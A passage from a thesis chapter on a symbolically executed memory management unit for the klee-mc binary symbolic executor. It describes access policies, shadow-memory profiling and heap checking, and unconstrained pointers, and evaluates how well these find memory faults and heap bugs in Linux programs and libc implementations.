accesses are irrelevant to the handler (i.e., processed no differently than the default
concrete path), then the symMMU overhead is amortizable. If concrete accesses to
an entire memory object can bypass the symMMU, the handler can explicitly insert
the object’s range into a software TLB so subsequent accesses follow the concrete fast
path for better performance.
A runtime programmed TLB controls concrete fast-path forwarding. The concrete
TLB maintains a fixed number of address ranges to pass to the fast path. A concrete
handler ignores accesses by registering address ranges with the TLB. The handler
reclaims accesses by removing address ranges from the TLB. Each state has its own
private TLB because state interleaving interferes with reproducing paths; flushing a
global TLB on state reschedule alters the instruction trace past the preemption point
from extra TLB misses.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 146
6.4 Access Policies and Analysis
Our symMMU supports a variety of access policies. For symbolic accesses, the choice
of policy affects solver overhead, state dilation, and testing completeness. We use the
symMMU’s capability to observe all accesses to extend the executor with new modes
of analysis on programs. Two new extensions, symbolic access profiling and heap
checking, use shadow memory to track metadata for every access. Another extension,
unconstrained execution, demand allocates memory buffers by access to dynamically
infer argument structure from program function behavior.
6.4.1 Symbolic Access Translation
A symbolic access may resolve to multiple addresses. The choice of access policy
influences the performance and completeness of symbolic accesses. We consider two
types of policies: partial and full. Partial policies transform pointers and check for
properties, but only occasionally dispatch an access and must be stacked. Full policies,
situated at the bottom of a handler stack, always dispatch an access.
Excessive Range Checking
A symbolic pointer spotentially generates many states because it may be unbound.
Following through on every precise address where an unbound pointer access lands is
expensive and usually uninformative; it suffices to know the set of feasible pointers
{p|p∈s[S]}is large. Range checking finds excessively stray accesses; if sfeasibly
exceeds a sensible distance (we use 256MB) from some p∈s[S], then the access is
flagged, otherwise the access continues down the stack.
Figure 6.4 lists a partial symbolic 8-bit load soft-handler, mmu load 8rangechk ,
which checks the range of a symbolic pointer s. First, the handler issues a solver
request in testptr invalid to find ap∈s[S], then builds a symbolic range check
fors. Whenscovers an extreme range, the state forks on the ifinto an out-of-
range and an in-range state because testptr invalid (s) is feasibly both true and
false. The out-of-range state is assumed to fault and is reported. The in-range state
proceeds down the stack to the next handler via the function pointer moload 8.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 147
MMUOPS SEXTERN( rangechk ) ; /∗setup s t a c k s t r u c t u r e s ∗/
#define M A X R A N G E ( ( ptrdiff t)0 x10000000 )
static int t e s t p t r i n v a l i d ( intptr ts ){
intptr tp = klee get value ( s ) ;
ptrdiff td = s−p ;
return ( s<0x1000 )|(d>M A X R A N G E)|(−d>M A X R A N G E) ;
}
uint8 tmmu load 8rangechk ( void∗s ){
/∗t e s t f o r e x c e s s i v e range ∗/
i f( t e s t p t r i n v a l i d ( ( intptr t) s ) )
klee uerror ( ”bad range ! ” , ” ptr . e r r ” ) ;
/∗proceed down the s t a c k ∗/
return MMUOPS S( rangechk ) . mo next−>mo load 8( s ) ;
}
Figure 6.4: Range checking handler for 8-bit loads.
Constant Symbolic Pointer Resolution
Concrete accesses are cheaper than symbolic. If the state’s path constraints for a
symbolic address to have exactly one solution, every future access can be concrete.
Whenp1,p2∈s[S] =⇒p1=p2, constant symbolic pointer resolution replaces every
swithp1and dispatches the concrete access.
Create Variable
Relaxing precise memory content can simplify symbolic access complexity with state
overapproximation at the cost of producing false positives. In this case, reading from
a symbolic pointer sreturns a fresh symbolic variable v. To reduce overhead, our
implementation keeps a mapping from old symbolic pointers to their variables. Since
this policy is blatantly unsound (suppose ∀p∈s[S].v̸=∗p)klee-mc never uses
it in practice. However, similar strategies appear elsewhere [45, 59, 131], indicating
that some consider it a worthwhile policy, so it is included for completeness and to
demonstrate the symMMU’s flexibility.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 148
uint8 tmmu load 8uniqptr ( void∗s ){
intptr tp , s i = ( intptr t) s ;
p = klee get value ( s i ) ; /∗g e t p in s [ S ] ∗/
klee assume eq ( si , p ) ; /∗bind s == p∗/
return∗((uint8 t∗)p ) ;
}
Figure 6.5: Address concretization for 8-bit loads.
Pointer Concretization
A symbolic access on sisconcretized by choosing a single p∈s[S] to represent s.
The executor calls its satisfiability solver with the constraints for a state Sto resolve
a concrete value p∈s[S]. Adding the constraint (= sp) toS’s constraint set binds
ptos; all subsequent accesses logically equivalent to sbecome logically equivalent
to accesses to p. This incomplete policy misses every valid address p′∈s[S] where
p′̸=p, but it is fast, used in practice, and makes for straightforward policy discussion.
Figure 6.5 lists an example full 8-bit load soft handler which concretizes the ac-
cess pointer. An 8-bit symbolic load access enters through mmu load 8uniqptr .
A concrete value p∈s[S] is retrieved with klee get value (s) (the sole solver
query). Next, the handler binds ptoswith the constraint (= p s) through
klee assume eq(s,p). Finally, the handler safely dereferences p(ifpis bad, it
is detected on the concrete path) and returns the value to the target program.
Fork on Address
Forking a state for every p∈s[S] explores all feasible accesses. Instead of calling
klee get value once (§6.4.1), forking on address loops until all feasible addresses
are exhausted. Since each feasible address consumes a solver call and a new state,
this policy is costly when |s[S]|is large.
Bounding explored feasible addresses reduces overhead but sacrifices complete-
ness. In order to shed some feasible address, the handler chooses addresses based on
desirable runtime or program properties. We implemented two bounded policies in
addition to complete forking: one caps the loop to limit state explosion and the other
forks on minimum and maximum addresses to probe access boundaries.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 149
Prioritized Concretization
Blindly concretizing a symbolic read access potentially overconstrains the fetched
value. Prioritized concretization searches for feasible addresses p∈s[S] such that the
data thatppoints to is symbolic. If there is such a p, thensis concretized to p, and
the symbolic value is returned.
Fork on Objects
The default klee policy (and similar policies [30, 52]) forks on feasible memory
objects, issuing object-wide accesses over symbolic arrays. When a symbolic access
falls within a spatially local region (e.g., a page), the access can be efficiently folded
into an expression as in Figure 6.1. Assuming this locality, forking for every feasible
memory object with symbolic indexing reduces the total forked states in exchange for
larger and potentially more expensive queries.
The fork-on-object policy forks a state for every memory object covered by a
symbolic memory access at s. For every memory object, a wide memory access
symbolically indexes the object state. Wide write accesses create large expressions
containing update lists for the object at the time of write. Most memory objects are
page-sized so our implementation uses a faster and simpler forking algorithm than
klee ’s binary search. Objects are enumerated by forking on unique page pointers
(p&∼4095)∈(s&∼4095)[S]. If a feasible object is smaller than a page, the handler
iterates over objects in order until the next page boundary. Wide accesses on these
objects are explicitly constructed; the handler uses klee wide intrinsics to issue
symbolically indexed accesses. Although the system could conceivably symbolically
index multiple objects per forked state, a distinct policy in its own right, it is unclear
how many objects at once would give the best query performance relative to total
states forked.
If-Then-Else Reads
A symbolic indexed read on an object state leads to unnecessary array overhead in
the solver when the feasible pointer set size |s[S]|is much smaller than the object.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 150
If-then-else reads translate an access into an if-then-else expression when the set s[S]
is small. When the number of addresses is bounded by nforp1,...,pn∈s[S] and
pi=pj=⇒i=j, the expression e1defined by the recursive relation
ei= (if(=spi) (∗pi)ei+1), en= (∗pn)
is returned by the dereference and the disjunction
(=sp1)∨(=sp2)∨...∨(=spn)
joinsS’s path constraints when |s[S]|>nfor soundness.
6.4.2 Shadowing Memory
A shadow memory analysis algorithm [100, 101, 117, 136] associates metadata with
memory addresses; it computes metadata from memory accesses and stores it to a
mapping (the shadow memory) of addresses to features. Since the symMMU controls
memory accesses, shadow memory is a straightforward extension. We use a shadow
memory runtime library for two additions to the executor: memory profiling and
heap-checking. The profiler increments a per-word shadow counter for every access.
The heap checker tracks program memory allocation status to detect heap violations.
Runtime Structures
Figure 6.6 illustrates the symMMU shadow memory structure. Symbolic shadow
memory is a map S:A→Vfrom addresses to shadow values. In the figure, a sym-
bolic access on two feasible bytes at areturns a shadow expression S(a) representing
shadow values for both feasible bytes in a single state. The hashed page number of
aindexes into an array of page buckets. Each bucket holds a list of demand allo-
cated shadow pages corresponding to pages of data memory. Retrieving S(a) uses a
wide access so states only fork per shadow page. Since the shadow memory code is a
library, the executor transparently handles all constraints and states.
An alternative shadow memory design [99] uses a two-level page table on 32-bit
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 151
Figure 6.6: Retrieving a disjunction of shadow values for a symbolic address.
addresses. An address indexes the table through two levels of indirection to retrieve
a shadow page in constant time. In practice, the symMMU shadow memory buckets
remain small so linear time overhead is negligible compared to the extra levels of
indirection or auxiliary tables needed for 64-bit addresses. Likewise, memory objects
are usually page-sized so wide accesses split into multiple states regardless of the data
structure.
Access Profiling
An access profiler can help a programmer find memory hot spots or understand cache
behavior. We developed a profiler to count symbolic accesses on each address. The
profiler keeps shadow counters for memory addresses on every state; every symbolic
access increments a setof feasible counters.
Unlike a traditional profiler, symbolic shadow state influences the profiler results.
For instance, a complete symbolic byte store on s[S] ={p,p+1}touches two memory
locations,pandp+ 1. Storing to two feasible memory locations updates two shadow
counters within a single state; the shadow counters become symbolic via symbolic
write. The profiler is free to choose any feasible counter value. In our implementation,
the profiler greedily increases memory coverage by choosing p∈s[S] whenS(p) = 0
and assuming S(x)>0 on path termination (when feasible) for all addresses x.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 152
Profiling also demonstrates the importance of guarding against recursion. A sym-
bolic access leads to a shadow counter update on multiple feasible shadow counters;
the shadow counter address is symbolic. Incrementing the counter through a sym-
bolic pointer triggers another profiling event in the software handler causing an infinite
loop. To prevent hanging, a flag guards against profiler handler reentrance.
Heap Checking
Heap access violations are common errors in system programs. A program accesses
freed or uninitialized heap data with little immediate consequence but eventual state
corruption. Dynamic analysis algorithms [66, 100] detect these errors at the point of
violation with shadow memory. The symMMU extends the memcheck algorithm [100]
to binary symbolic execution with incomplete heap information.
Symbolically processing heap memory accesses exploits pointer reach knowledge
lost to concrete test cases. Although symbolically derived tests are compatible with
traditional heap violation detection algorithms [59], concrete testing alone leads to
false negatives. Consider a read from a buffer b, initialized up to some n, at a symbolic
offseti≤n. For a concrete test, imay be chosen such that b[i] is initialized ( i<n ),
missing the error. Under symbolic analysis b[i] is both initialized and uninitialized so
the error is modeled.
The heap checker models the heap as the program runs. A set of disjoint address
ranges (heap blocks) [ a,a+n)∈H tracks a state’s current heap H. When a program
allocates a heap block b, the checker adds btoH. If a pointer p∈s[S] is inH,
∃b∈H.p∈b, thensis a feasible heap address .
An access is checked by observing the shadow value for each accessed byte address.
Each byte is assigned two bits of shadow state representing its heap status (similar to
purify [66] and memcheck [100]). Each byte is assigned one of the following shadow
values:
•OK. Access is safe; may be a heap data.
•UNINIT . Heap address with uninitialized data.
•FREE . Former heap address.
Figure 6.7 illustrates the finite state machine which manages the heap status.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 153
Initially, accesses default to OK; the tracked heap is set to empty. To avoid overhead
from repeatedly calling the symMMU, long, contiguous OKranges are inserted into the
concrete address pass-through TLB. When the program acquires a pointer pthrough
an allocation function (e.g., malloc (n)), the heap checker intercepts the call, records
the allocated block and marks the shadow memory for [ p,p+n) as UNINIT . When
pis deallocated with a call free (p), the heap checker retrieves p’s lengthn, marks
[p,p+n) asFREE , and drops the [ p,p+n) record fromH.
Figure 6.7: The memcheck shadow state machine.
The heap checker detects three heap violations:
Dangling Accesses. An access to freed heap memory is a dangling access. This
violates the heap discipline because all heap accesses from client code should reference
allocated memory; if a program accesses freed memory, it may corrupt state or retrieve
an unexpected value. A handler reports a dangling access whenever an access can
feasibly resolve to a FREE shadow value.
Uninitialized Reads. The contents of the heap are undefined on allocation.
Reads from freshly allocated uninitialized memory produces undefined behavior. If a
read access pointer feasibly maps to UNINIT , the heap checker produces a test case
for an uninitialized read.
Double Frees. Each heap allocation pairs with at most one deallocation. Fea-
sibly deallocating memory twice consecutively causes the heap checker to terminate
the state and report a double free. Early termination has a performance benefit by
skipping the double-free detection error path in libc .
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 154
6.4.3 Unconstrained Pointers
Unconstrained execution [50, 68, 75, 110] tests functions rather than full programs.
Instead of trying to reach a specific function through a path from the beginning of a
program, the symbolic executor jumps directly to the target function, lazily initializ-
ing pointer arguments with symbolic data. These unconstrained pointers initialize on
first access, expand as needed, are relocatable, and require no type information. We
describe handlers written for the symMMU which manage unconstrained pointers.
An unconstrained pointer is a special symbolic pointer defined by the way it is
accessed on a path. Rather than having a concrete address in memory, accessing an
unconstrained pointers maps to a demand allocated buffer. All pointers passed to a
target function for unconstrained execution are unconstrained. To avoid false posi-
tives for memory access faults, the executor optimistically assumes symbolic pointers
are valid. Initially accessing an unconstrained symbolic pointer udemand allocates
unconstrained memory buffers with symbolic data to back u. These buffers have
concrete physical length, associated with the allocated backing buffer, as well as a
symbolic virtual length, based on precise observed range of access, which facilitates
expansion. Subsequent accesses to uretrieve the same data through a consistent
translation map. The translation map routes structurally distinct, but semantically
nearby, unconstrained pointers to the same buffer. Finally, unconstrained pointers
resolve to concrete pointers to generate a test case.
Translation Entries
To make unconstrained accesses optimistic, rather than unbounded and contingent,
the symMMU handlers must translate unconstrained pointers to buffers mapped into
the state’s address space. Figure 6.8 shows the organization of this translation. From
the top, unconstrained pointers map into a translation table by expression hash. The
translation table points to translation entries which each describe an unconstrained
pointer’s demand allocated memory buffer.
The translation table maps unconstrained pointers to translation entries by ad-
dress expression hash. A hash function h:E→{0,1}64from expressions to 64-bit
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 155
Figure 6.8: Unconstrained pointer structures.
values maps a symbolic address uto the table for solverless lookup. Since uis sym-
bolic, it must have some variable subexpression (e.g., (select i a) reads the sym-
bolic array aat index i). The hash hfunction relies on the idea that distinct variable
subexpressions imply feasibly distinct pointers. For example, u=(select 0 x) and
u′=(select 4 x) giveh(u)̸=h(u′) because the values are feasibly unrelated. In
contrast, (add 1 (select 0 x)) and(add 2 (select 0 x)) refer to one base sym-
bolic pointer uand therefore hash equally; the difference is a small constant offset.
Theoretically this heuristic is unsound in that two distinct variable subexpressions
may hash equally, but this is never observed in practice.
A translation entry defines a demand allocated buffer for an unconstrained pointer,
maintaining both the buffer bounds and backing memory. The buffer centers around
a pivotu, the unconstrained pointer of the first access. The entry holds the buffer’s
concrete pointer pand its current concrete radius rc. For precise bounds, the entry
tracks the minimum uminand maximum umaxaccess pointers. The difference between
uminandumaxdefines a symbolic radius r. Taking all entries, the ith entry has a
pivotuiand a symbolic radius ri. Pivots are ordered by entry, u0< u 1< ... < u k,
when resolving to concrete addresses on path termination.
Demand Allocation
Unconstrained demand allocation has two phases. First, an initial access to a distinct
unconstrained pointer creates a translation entry and buffer around the pointer. Next,
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 156
future accesses near the pointer expand the buffer keeping values and constraints from
prior accesses.
Buffer Initialization. An access to a new unconstrained pointer uallocates
space so future accesses are consistent. First, the soft handler determines uis dis-
tinct and distant from previously accessed unconstrained pointers. Next, the handler
creates a translation entry pivoted around uand allocates a buffer centered about u.
Finally, the access is serviced through the buffer and the target program proceeds.
Ifuhas no translation, the runtime allocates an unconstrained buffer. First, a
translation entry keyed by h(u) is inserted into the table. A small initial buffer (16
bytes) filled with unconstrained symbolic data is allocated to a fresh translation entry.
Subsequent accesses around uroute to the buffer through the access handlers.
Buffer Expansion Suppose an access to a pointer u′based on an unconstrained
pointersexceeds the bounds of the initially allocated buffer. By the optimistic access
policy, the buffer is extended when the distance from the buffer is reasonably short.
There are two cases: the fast case h(u′) =h(u) and the slow case h(u′)̸=h(u). The
fast caseh(u′) =h(u) suffices to explain buffer extension; the h(u′)̸=h(u) case is
handled in Section 6.4.3.
Whenh(u′) =h(u), the runtime uses the translation entry for u. When the
distance between uandu′is less than the buffer radius, |u−u′|<rc, there is no need
to extend the buffer. Otherwise, the buffer is copied to a new buffer with a radius
of 2rc; the buffer pointer and rcare updated in the translation entry to reflect the
expansion.
Aliasing
Two unconstrained pointers uiandujmay map to the same buffer, |ui−uj|< ri,
but hash unequally, h(ui)̸=h(uj). Having distinct translation entries for uianduj
potentially assigns multiple values to one address, leading to nonsense paths from
an incoherent memory model. This incoherence is caused by aliasing; we outline our
method for efficiently resolving aliases.
An access to an unconstrained pointer uwith an untranslated hash h(u) undergoes
alias resolution before acquiring a translation entry. First, the pointer uis tested for
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 157
inclusion in the unconstrained arena [ UCMIN,UCMAX) with an andmask; ifuis
unconstrained, then UCMIN≤u < UCMAXis satisfiable. Next, the runtime tests
translation entry inclusion feasibility to resolve the entry for u. Inclusion testing relies
on the pivot ordering u0<...<u nand entry ordering [ ui−ri,ui+ri)<[uj−rj,uj+rj)
wheni < j . Hence,k= arg min
i(u′≤ui+ri) impliesu′∈[uk−rk,uk+rk). If
kexists, the runtime updates the translation table to point h(u) to the entry for
h(uk). Inclusion testing may accrue additional aliases by forking new states where
ui−ri≤u′<ui+rifori>k . If there is no feasible entry, h(uk) is assigned its own
translation entry.
Concrete Address Assignment
A dereferenced unconstrained pointer eventually binds to a concrete address. The
runtime postpones address assignment by translating unconstrained pointers to a
backing buffer on the fly. To produce a concrete test case, the runtime uses the solver
to assign concrete addresses to pointers.
Premature address assignment unnecessarily constrains unconstrained pointers,
masking otherwise feasible paths. Consider the memcpy library call which copies
values in memory from a pointer u1to a non-overlapping location starting at pointer
u2. A na ̈ ıve memcpy loads a byte from u1, stores it to u2, then increments each
pointer. However, this implementation has needless overhead; multi-byte accesses
reduce the total iterations by at least half. Such multi-byte accesses incur additional
cost for unaligned addresses. Hence a fast memcpy uses distinct code depending on
the alignment (i.e., the lower bits) of u1andu2. Eagerly assigning concrete addresses
tou1andu2drops the unaligned corner cases.
The pivots u0,...,unare assigned concrete addresses on path termination. The
handlers control assignment by ordering pivots at time of first access and bounding
addresses within the unconstrained arena [ UCMIN,UCMAX]. For the base case u0,
the constraints UCMIN≤u0−r0andu0+r0<UCMAXhold. In general, inserting
thekth pivotuktakes the constraints uk−1+rk−1<uk−rkanduk+rk<UCMAX.
A cleanup handler minimizes rkto keep buffer sizes small.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 158
MMU Dispatcher LoC.
Original Built-in KLEE MMU 373
Inst. SymMMU 229
Built-in SymMMU 338
Shared MMU Infrastructure 368MMU Policy LoC.
Deref. by Concretization 19
Deref. by Address Forking 21
Deref. by Object Forking 42
Shadow Memory 397
Access Profiler 65
Heap Analysis 371
Unconstrained Pointers 251
Table 6.3: Lines of code for MMU components.
6.5 Evaluation
This section evaluates the symMMU against the criteria set in Section 6.1. Simplicity
of the symMMU is quantified in terms of the implementation’s total lines of code.
Dispatch microbenchmarks and a comparison of discovered access faults on Linux
programs demonstrate the symMMU’s performance is competitive with a built-in
hard-coded MMU. Policy microbenchmarks, heap checking on programs, and uncon-
strained execution on libraries show the symMMU flexibly supports a useful variety
of access and analysis policies.
6.5.1 Implementation Complexity
Figure 6.3 shows the amount of code for each MMU to quantify relative implemen-
tation complexity. The line counts were calculated with SLOCcount [132] on the
relevant source files. The table is split between executor code (C++ compiled to bi-
nary) and runtime code (C compiled to LLVM bitcode). Of note, the baseline klee
MMU (373 lines) needs slightly more code than the symMMU (340 lines) implemen-
tation, suggesting the symMMU is simpler to implement.
6.5.2 Dispatch Mechanism
The design of the symMMU dispatch mechanism strongly influences its performance.
We use a microbenchmark to compare the built-in symMMU with instrumentation to
show explicit support for a symMMU is competitive with the baseline klee MMU and
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 159
superior to instruction rewriting. Furthermore, we find the concrete TLB improves
symMMU performance on concrete workloads with low overhead.
Access Instrumentation
We compared concrete access overhead among the baseline klee MMU, the inter-
preter symMMU, and an instrumented symMMU to measure the concrete access per-
formance overhead from using a symMMU. The instrumented symMMU replaces all
target program loads and stores with runtime function calls which partition accesses
as concrete or symbolic and forward to the appropriate handler. Each MMU was
benchmarked with strcpy on 4096 bytes, repeated 10,000 times in a program. The
baseline MMU and built-in symMMU issued the same number of LLVM instructions,
since it has a built-in concrete access path, and used equal time. The instrumented
symMMU issued 2 .3×as many instructions and took 1 .8×longer to complete; calling
a handler on every program memory access is costly. Instrumentation is relatively
slower so we only use the built-in symMMU.
TLB
To measure the cost of concrete symMMU handling, we compared the performance
among the fast path, na ̈ ıve handling, and TLB assistance using the benchmark from
Section 6.5.2. The concrete symMMU policy passes every concrete address to the
built-in fast path and the TLB is set to 128 entries. Without TLB support, the
benchmark used 1 .9×as many instructions and 1 .5×as much time as the baseline
MMU without concrete symMMU support. With TLB support, the benchmark dis-
patched 1.2×as many instructions and used 1 .1×as much time as the baseline MMU.
6.5.3 Policy Microbenchmarks
A set of access intensive microbenchmarks measure the difference among symMMU
policies and the baseline klee MMU. Each microbenchmark is compiled from C and
symbolically executes one of 23 standard libc string functions for five minutes. Policy
performance is ranked by generated tests over the baseline klee MMU (i.e., test case
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 160
speedup); paths naturally vary across policies on account of different code in the
runtime handlers.
The benchmarks frequently access symbolic string buffers, stressing the MMU. A
symbolic buffer bspans two pages in length (8192 bytes) to highlight forking on the
fork by object policy. Two symbolic integers model offsets ∆ 1and ∆ 2intob, another
symbolic integer models string length (e.g., for strncpy ). Two pointers p1andp2,
withpk=b+(∆k%(k∗PAGE SIZE )), give two in-bound feasibly overlapping pointers
which are passed into the string function.
Figure 6.9 shows the test results. A majority of benchmarks generate more tests
than baseline (88 more, 48 fewer). Conservatively, most symMMU policies are no
worse at completing paths than the baseline klee policy. One exception is ITE
(§6.4.1) which submits many solver queries for feasible addresses before constructing
aniteexpression. On the other hand, pointer concretization, which should produce
few tests, sometimes outperforms baseline. To explain, the baseline forks all feasible
states at once for a symbolic access, issuing many queries. By contrast, the symMMU
forks in the runtime so expensive accesses are preempted so that other states may
interrupt the memory operation and run. The inconsistent performance among poli-
cies and functions demonstrates the importance of policy variety since no one simple
policy is best.
6.5.4 Memory Faults in Linux Programs
To judge the effectiveness of the symMMU at scale, we ran 12508 64-bit Linux pro-
grams taken from Fedora 20 for five minutes each under the symbolic executor to
find memory access violation test cases. These test inputs cause access faults in
unmodified third party programs.
Table 6.4 shows the number of programs and test cases found by the symMMU to
have memory errors using the klee policy (§6.4.1) binned by stack trace. To be sure
the results were true positives, the table results were confirmed at the binary trans-
lation level through a test replay program based on the LLVM JIT. For comparison,
the standard klee MMU flagged 2252 tests (1751 confirmed by JIT replay) whereas
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 161
 0.01 0.1 1 10 100indexrindexstpcpystrcasecmpstrcatstrchrstrcmpstrcollstrcpystrcspnstrdupstrfrystrlenstrncasecmpstrncatstrncmpstrncpystrpbrkstrrchrstrspnstrstrstrtokstrxfrmTests over BaselineTest Cases Generated by SymMMU over Baseline KLEE
Concrete
ForkAddr
PrConcrete
ForkObj
ITE
CreateVar
KLEE
Figure 6.9: String microbenchmark testing speed-up.
Error Type Programs Tests
Range Test 92 439
Symbolic Load 83 147
Symbolic Store 39 46
Concrete Load 852 1308
Concrete Store 425 641
Total 1389 2589
Table 6.4: Access faults found with symMMU
the symMMU flagged 2667 tests (2589 confirmed). Two reasons explain the klee
MMU’s extra false positives: first, the klee MMU is poorly tested (a few hundred
LLVM bitcode programs), and second, the klee MMU is intricate and difficult to get
right. Similarly, the symMMU pass issued 2 .1×solver queries over the klee MMU
pass; symMMU queries tend to solve faster.
6.5.5 Profiler
Figure 6.10 illustrates the symbolic profiler’s cost for a simple benchmark. The bench-
mark program tests the profiler coverage policy by looping over an array awithn
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 162
 0.1 1 10 100 1000
 1  4  16  64  256  1024 0 500 1000 1500 2000 2500 3000 3500Time (s)
Total Queries
Shadowed Symbolically Accessed SitesSymbolic Sites versus Time and Queries for Profiler Benchmark
Time
Queries
Figure 6.10: Profiler benchmark performance.
elements, writing 1 to a[s[i]] wheresis an array of symbolics; s’s assignment controls
which elements of aare updated. The shadow memory’s granularity is configured
to have a shadow word for each element in a. Complete coverage of aimpliess
contains all values between 0 and n−1; the profiler imposes these constraints on
s. For overhead, total solver queries grows linearly with respect to n. Time for the
benchmark exponentially rises with n, peaking at 338 seconds for 1024 elements; at
2048 elements, solver performance completely deteriorates and the benchmark times
out after 30 minutes.
6.5.6 Heap Violations
The symbolic executor produces a concrete test case for every heap violation it finds.
Since a test could be a false positive (e.g., from bugs in the tool), it is important to
automatically detect true positives. Unlike access faults, heap violations in general
do not trigger specific hardware events. SAGE [59], for instance, has special support
to force crashes on heap violations. To confirm errors without the luxury of faults,
the symMMU heap checker replay system feeds test cases with system call logs into
an unmodified third-party heap analysis tool, valgrind [100] memcheck.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 163
Type Tests Code Sites Programs
Double Free 56 43 33
Dangling Access 405 147 46
Uninitialized Read 1195 94 230
Total 1656 240 267
Table 6.5: symMMU-derived Heap Violations
The system uses a combination of ptrace and iterative system call realignment
to replay test cases under valgrind. The test replay process uses ptrace to control a
valgrind process running the target program. The replay process intercepts valgrind’s
system calls; a call is dispatched natively or intercepted and replayed, depending on
whether the program or valgrind invoked the system call. In essence, two system
models must be reconciled: test cases use precise system call logs whereas valgrind
rewrites and inserts system calls. On interception, if the requested system call matches
the head of the system call log, the valgrind process absorbs the log’s side effects.
Otherwise, the call forwards to the operating system. Since there is no clear point
where valgrind calls end and target program calls begin, the system call log initially
synchronizes with valgrind by ignoring the first nsystem calls. The value nis found
by successively incrementing nto maximize the number of replayed system calls.
We checked 1919 Linux programs from the host machine’s (x86-64 Gentoo) /bin ,
/sbin ,/usr/bin , and /usr/sbin/ directories, symbolically executed for five min-
utes. Binaries were taken from the host machine because valgrind is sensitive to its
host configuration. Table 6.5 lists valgrind-confirmed heap violations by number of
tests, code sites (to control for faulty libraries), and programs (to control for noisy
programs). In total 14247 violations were flagged in 761 programs; valgrind confirmed
11.6% of these tests. Valgrind and the executor disagree for several reasons: neither
are bug-free, system calls fail to align, and differing memory layouts interfere with
system call replay. Regardless, cross-checking with a third-party tool strengthens
evidence of legitimate bugs.
Figure 6.11 illustrates the complexity of errors found by the heap checker. This
pared-down example from cpio-2.11 spans three source files; it reads a buffer length
(cnamesize ) from input ( short hdr), allocates a buffer cname , passes it around,
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 164
tape buffered read (
( (char∗) short hdr ) + 6 , in des , sizeof∗short hdr−6 ) ;
file hdr−>cnamesize = short hdr−>cnamesize ;
file hdr−>cname = ( char∗) xmalloc ( file hdr−>cnamesize ) ;
cpio safer name suffix ( f i l e h d r . c name , . . . ) ;
char∗p = safer name suffix (name , . . . ) ;
size tprefix len= FILE SYSTEM PREFIX LEN( file name ) ;
Figure 6.11: A tortuous heap read violation in cpio .
then reads the data. If cnamesize is 0, prefix lenrelies on uninitialized data,
leading to undefined behavior.
6.5.7 Unconstrained Pointers
Explicitly modeling data structures for testing function arguments is tedious. Demand
allocation on unconstrained pointers derives argument structure automatically. We
evaluate symMMU unconstrained pointers on bare functions by symbolically gener-
ating test inputs for functions in several compiled libc implementations. These tests
directly translate to C sources which serve as native test fixtures. Replaying the tests
across libraries reveals implementation differences and fundamental bugs.
Generating libc Inputs
Test inputs were derived by symbolically executing C standard library ( libc ) libraries
with unconstrained pointers. We tested functions from four up-to-date libc imple-
mentations: newlib-2.1.0, musl-1.1.0, uclibc-0.9.33.2, and glibc-2.19. Functions were
symbolically executed by marking the register file symbolic and jumping to the func-
tion; root unconstrained pointers are demand allocated on dereference of a symbolic
register. Each function was allotted a maximum of five minutes of symbolic execution
computation time and 200 test cases. Since we intend to find differences between sup-
posedly equivalent implementations, only functions shared by at least two libraries
were evaluated. In total 667 functions shared among at least two libraries exhibited
unconstrained demand allocations.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 165
C Test Cases
To run unconstrained test cases natively on the host operating system, test cases
are first converted into C code. The unconstrained buffer information is translated
to a C source file then compiled into a binary program. This binary program maps
the unconstrained buffers to their expected locations to reproduce the unconstrained
environment for replaying the test. The binary dynamically loads the library and
runs the target function with the test input.
The C test fixture programs operate as follows:
1 Declare initial data from unconstrained buffers.
2 Allocate memory buffers at given addresses.
3 Copy initialization data into buffers.
4 Load target function pointer from shared library.
5 Call target function with symbolic register arguments.
6 Print buffer contents and function return value.
Every C test case assigns unconstrained buffer data to physical locations in the test
process. Every non-alias translation entry has an unconstrained descriptor structure
which stored in an array of entries. The descriptor includes the buffer contents and
length, the start of the buffer , the base of the memory segment to allocate and its
length in pages.
Following the target function call, test results come from two parts of the process
state: the return value and the input buffers. If a function returns a value that can
be dereferenced, the value is translated to a fixed constant to conservatively avoid
mismatches from differing addresses across libraries. When a function mutates its
arguments, the values from the input buffers soundly reflect the updates.
libc Differences
Replaying the unconstrained buffers through the libraries revealed many implemen-
tation differences. The system detects subtle bugs in uncommon, but standard, cases
which rely on pointer arguments. Complete bulk results suggest many potentially
serious (although often benign) mismatches.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 166
unsigned long a [ 1 6 ] ={0};
for ( i = 0 ; i <4 ; i++){
a [ i ] = s t r t o u l ( s , &z , 0 ) ;
i f( z==s||(∗z &&∗z != ’ . ’ )||! i s d i g i t (∗s ) )
return−1;
i f( !∗z )break ;
s=z +1;
}
switch ( i ){
case 0 : a [ 1 ] = a [ 0 ] & 0 x f f f f f f ; a [ 0 ] > >= 24;
case 1 : a [ 2 ] = a [ 1 ] & 0 x f f f f ; a [ 1 ] > >= 16;
